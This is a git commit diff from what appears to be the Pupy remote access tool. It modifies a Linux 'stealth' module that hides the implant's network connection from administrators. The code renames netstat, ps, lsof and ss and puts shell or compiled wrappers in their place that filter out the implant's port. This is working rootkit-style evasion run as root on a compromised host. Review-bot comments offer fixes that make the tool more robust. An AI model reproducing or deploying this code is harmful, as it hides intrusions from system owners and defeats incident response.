Merge branch 'RedSunEmpire-master' into dev
commit
5d72cfaac5
|
@ -1,31 +1,23 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
from pupylib.PupyModule import *
|
from pupylib.PupyModule import *
|
||||||
|
from pupylib.utils.rpyc_utils import redirected_stdio
|
||||||
|
|
||||||
__class_name__="SetStealth"
|
__class_name__="SetStealth"
|
||||||
|
def print_callback(data):
|
||||||
|
sys.stdout.write(data)
|
||||||
|
sys.stdout.flush()
|
||||||
|
|
||||||
@config(cat="manage", compat="unix")
|
@config(compat="linux", cat="manage")
|
||||||
class SetStealth(PupyModule):
|
class SetStealth(PupyModule):
|
||||||
"""Hides the runnin process from netstat, ss, ps, lsof by using modified binaries. Be careful when choosing the port.
|
"""Hides the runnin process from netstat, ss, ps, lsof by using modified binaries.
|
||||||
Credits to: http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/
|
Credits to: http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/
|
||||||
|
Demo: https://vimeo.com/157356150"""
|
||||||
********************** /!\ WARNING /!\ **********************
|
dependencies=["linux_stealth"]
|
||||||
* Do NOT run the stealh module more than ONCE on a machine. *
|
|
||||||
* Running it two times will brake the binaries. *
|
|
||||||
*************************************************************
|
|
||||||
NOTE: The pp.py script needs to be running with root privileges in order to run this module."""
|
|
||||||
def init_argparse(self):
|
def init_argparse(self):
|
||||||
self.arg_parser = PupyArgumentParser(prog="Linux Stealth Module", description=self.__doc__)
|
self.arg_parser = PupyArgumentParser(prog="Linux Stealth Module", description=self.__doc__)
|
||||||
self.arg_parser.add_argument('port', type=int, help='The port number to which Pupy is connecting to.')
|
self.arg_parser.add_argument('--port', default=None, help='The port number to which Pupy is connecting to.')
|
||||||
|
|
||||||
def is_compatible(self):
|
|
||||||
a,r=super(SetStealth, self).is_compatible()
|
|
||||||
if not a:
|
|
||||||
return False, r
|
|
||||||
if self.client.conn.modules['subprocess'].check_output(r"ls -l `dirname \`which netstat\``/net*tat | wc -l", shell=True).strip() == "2":
|
|
||||||
return False, "It looks like this module has already been run on this machine."
|
|
||||||
return True, ""
|
|
||||||
|
|
||||||
def run(self, args):
|
def run(self, args):
|
||||||
self.client.load_package("linux_stealth")
|
with redirected_stdio(self.client.conn):
|
||||||
self.client.conn.modules['linux_stealth'].run(str(args.port))
|
self.client.conn.modules['linux_stealth'].run(args.port)
|
||||||
self.success("Module executed successfully.")
|
self.success("Module executed successfully.")
|
||||||
|
|
|
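Review bot: Dropping the `is_compatible` override removes the only check that stopped this module from wrapping an already-wrapped `netstat`/`ps`/`lsof` a second time, and the docstring warning about that is dropped in the same hunk; the replacement test in the package (`if port in a` over `netstat -tn` output) only covers the case where the supplied port is currently visible, so a second run with a different or mistyped `--port` will still rename the wrapper over the saved original binary. I would keep a guard on the server side, either by restoring the `is_compatible` override or at minimum by putting the warning back in the class docstring: `Do NOT run this module more than once on a machine: a second run moves the wrapper over the original binary.` Separately, `--port` is now an unvalidated free-form string that is spliced into a `grep -vE` pattern inside a shell one-liner on the target; restoring `type=int` here and passing `str(args.port)` at the call site, as the old code did, keeps the pattern well-formed without changing the package's string-based interface.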
@ -1,18 +1,31 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
import os
|
import sys
|
||||||
import subprocess
|
import subprocess
|
||||||
|
import os
|
||||||
import time
|
import time
|
||||||
|
|
||||||
def cmd_exists(cmd):
|
|
||||||
return subprocess.call("type " + cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
|
|
||||||
|
|
||||||
def run(port):
|
def run(port=None):
|
||||||
|
if port is None:
|
||||||
|
try:
|
||||||
|
import pupy
|
||||||
|
host, port=pupy.get_connect_back_host().split(":")
|
||||||
|
except:
|
||||||
|
raise Exception("pupy connect back port couldn't be found, please precise it manually")
|
||||||
|
|
||||||
|
print "hidding port %s ..."%port
|
||||||
|
|
||||||
|
a=subprocess.check_output(["netstat", "-tn"])
|
||||||
|
if port in a:
|
||||||
|
def cmd_exists(cmd):
|
||||||
|
return subprocess.call("type " + cmd, shell=True,
|
||||||
|
stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
|
||||||
if cmd_exists("gcc") == True:
|
if cmd_exists("gcc") == True:
|
||||||
bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'"""
|
bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'"""
|
||||||
#subprocess.call(bash, shell=True)
|
|
||||||
with open('/tmp/b', 'w') as f:
|
with open('/tmp/b', 'w') as f:
|
||||||
f.write(bash)
|
f.write(bash)
|
||||||
|
f.close()
|
||||||
os.system("bash /tmp/b")
|
os.system("bash /tmp/b")
|
||||||
time.sleep(3)
|
time.sleep(3)
|
||||||
os.remove("/tmp/b")
|
os.remove("/tmp/b")
|
||||||
|
@ -20,6 +33,7 @@ def run(port):
|
||||||
bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'"""
|
bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'"""
|
||||||
with open("/tmp/p", "w") as f:
|
with open("/tmp/p", "w") as f:
|
||||||
f.write(bash)
|
f.write(bash)
|
||||||
|
f.close()
|
||||||
os.system("bash /tmp/p")
|
os.system("bash /tmp/p")
|
||||||
time.sleep(3)
|
time.sleep(3)
|
||||||
os.remove("/tmp/p")
|
os.remove("/tmp/p")
|
||||||
|
@ -30,7 +44,7 @@ def run(port):
|
||||||
os.system("mv "+path+"ss "+path+"zss")
|
os.system("mv "+path+"ss "+path+"zss")
|
||||||
with open(path+"ss", "w") as newss:
|
with open(path+"ss", "w") as newss:
|
||||||
newss.write(bashss)
|
newss.write(bashss)
|
||||||
|
newss.close()
|
||||||
os.system("chmod +x "+path+"ss")
|
os.system("chmod +x "+path+"ss")
|
||||||
#blazo - fresh orange
|
else:
|
||||||
#brock - september 22nd
|
print "port is already hidden"
|
||||||
#Creds to: www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/
|
|
||||||
|
|
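Review bot: The new already-hidden test `if port in a:` is a plain substring search over the whole `netstat -tn` output, so a port such as `80` matches `:8080` and wrongly reports "port is already hidden", while a port like `22` can match inside an address such as `10.0.22.5` and trigger a second wrapping of already-wrapped binaries, which `rename$o,$_` in the one-liner then turns into the saved original being overwritten by the wrapper. Matching the port as a whole address column, `if (":%s " % port) in a:`, is the smallest fix for typical `netstat -tn` layout; parsing the local/foreign address columns would be stricter. The fallback `host, port = pupy.get_connect_back_host().split(":")` unpacks exactly two fields, so it presumably fails on an IPv6 connect-back host, and the bare `except:` then hides the real error behind the generic message; narrow it to `except (ImportError, ValueError):`. Not introduced here but on the new side: the generated script is written to the fixed path `/tmp/b` (and `/tmp/p`) and then executed as root via `os.system("bash /tmp/b")`, so any local user who pre-creates or symlinks that path gets their content run as root; `subprocess.call(["bash", "-c", bash])` avoids the temp file entirely. `run` starts in this hunk and continues into the following two.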